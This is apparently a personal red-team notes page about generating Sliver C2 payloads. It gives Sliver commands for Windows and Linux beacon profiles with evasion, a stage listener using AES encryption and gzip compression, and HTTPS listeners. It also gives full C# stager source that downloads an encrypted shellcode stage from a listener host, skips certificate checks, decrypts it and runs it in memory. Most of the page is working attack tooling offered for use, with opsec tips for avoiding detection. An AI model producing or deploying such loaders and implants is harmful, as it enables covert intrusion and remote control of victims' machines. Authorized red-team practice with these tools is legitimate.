Sliver Payload Generation

The content on this page is exclusively intended for my personal notes, serving as a swift and efficient reference guide specifically tailored to the art of crafting Sliver payloads.

Generate a sliver profile and staged listener

To initiate the generation of staged payloads, we must first create two pivotal elements: a sliver profile and a staged listener. The sliver profile serves as a sophisticated configuration framework for our cutting-edge stage 2 payload, while the staged listener operates as a stage 1 listener/payload.

To embark on this cybernetic journey, execute a command akin to the sophisticated techniques used in crafting Windows shellcode. By doing so, you will successfully forge the 'https-win' sliver profile, brimming with powerful capabilities and enhanced cyber functionalities.

Windows Beacon Profile

profiles new beacon --arch amd64 --os windows --http https://192.168.68.135:443 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 no_games

Linux Beacon Profile

profiles new beacon --arch amd64 --os linux --mtls 172.16.1.2:4433 -f elf --evasion --timeout 300 --seconds 5 --jitter 1 no_rulez

Note: For opsec purposes lets use gzip compression and AES encryption settings.

HTTPS Listener for Windows Profile

stage-listener --url https://192.168.68.135:4433 --profile no_games --compress gzip --aes-encrypt-key "LgUmeMnmUpRrCBRB" --aes-encrypt-iv "nStxRW5o6TNHcKBx"

Start Listener for Windows / Linux Profile

https --lhost 192.168.68.135 --lport 443

C# payload Template

Bishop-Fox was kind enough to provide an awesome C# template for our staged payload. Below you can expand the code and use it for yourself if needed. Ensure you replace AES Key and AES IV with what you designated above.

C# template here in the Sliver documentation

using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

namespace Custom_Stager
{
    class Program
    {
        private static string url = "https://192.168.68.135:4433/text-fonts.woff";
        private static string AESKey = "LgUmeMnmUpRrCBRB";
        private static string AESIV = "nStxRW5o6TNHcKBx";

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        // Decrypt
        private static byte[] AESDecrypt(byte[] ciphertext, string AESKey, string AESIV) {
            byte[] key = Encoding.UTF8.GetBytes(AESKey);
            byte[] IV = Encoding.UTF8.GetBytes(AESIV);

            using (Aes aesAlg = Aes.Create())
            {
                aesAlg.Key = key;
                aesAlg.IV = IV;
                aesAlg.Padding = PaddingMode.None;

                ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);

                using (MemoryStream memoryStream = new MemoryStream(ciphertext))
                {
                    using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Write))
                    {
                        cryptoStream.Write(ciphertext, 0, ciphertext.Length);
                        return memoryStream.ToArray();
                    }
                }
            }
        }

        // Gzip 
        public static byte[] Decompress(byte[] input)
        {
            using (MemoryStream tmpMs = new MemoryStream())
            {
                using (MemoryStream ms = new MemoryStream(input))
                {
                    GZipStream zip = new GZipStream(ms, CompressionMode.Decompress, true);
                    zip.CopyTo(tmpMs);
                    zip.Close();
                }
                return tmpMs.ToArray();
            }
        }

        public static byte[] Download(string url) {
            ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;
            System.Net.WebClient client = new System.Net.WebClient();
            byte[] shellcode = client.DownloadData(url);

            return shellcode;
        }

        public static void Execute(byte[] code) {
            List<byte> list = new List<byte> { };   

            for (int i = 16; i <= code.Length -1; i++) {
                list.Add(code[i]);
            }

            byte[] encrypted = list.ToArray();
            
            byte[] decrypted;
            decrypted = AESDecrypt(encrypted, AESKey, AESIV);   // First, AES decrypt

            byte[] decompressed = Decompress(decrypted);        // Second, GZip decompress
            
            // Execute stuff
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)decompressed.Length, 0x3000, 0x40);
            Marshal.Copy(decompressed, 0, addr, decompressed.Length);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            return;
        }

        // Main Entry
        public static void Main(String[] args) 
        {
            // Get stagd payload
            byte[] output = Download(url);

            Execute(output);

            return;
        }
    }
}

Payload Creation

Using the C# template above along with our "AES" key and "AES" IV we can create out staged payload by compiling on a like target such as "Windows 2019".

Success!!!!

Create new Beacon shellcode for Windows using your HTTPS

Note: profile is not needed for this step.

Sliver C2 employs two distinct communication methods: Beacons and Sessions. When conducting red team operations for enhanced operational security (opsec), Beacons are the preferred choice due to their use of asynchronous communications, where they periodically check-in at specific intervals. In contrast, Sessions involve an interactive mode connection, which tends to be more noisy and less conducive to maintaining opsec.

generate beacon --http https://192.168.68.135 --save /home/kali/ --seconds 60 --os windows --evasion

Create new Beacon payload for linux using your HTTPS

Note: profile is not needed for this step

If you targeting a linux operating system you can use the syntax below to generate linux payloads.

generate beacon --http https://192.168.68.135 --save /home/kali/ --seconds 60 --os linux --evasion

PreviousSliver Installation NextSliver Msfvenom Payloads

Last updated 1 year ago

Was this helpful?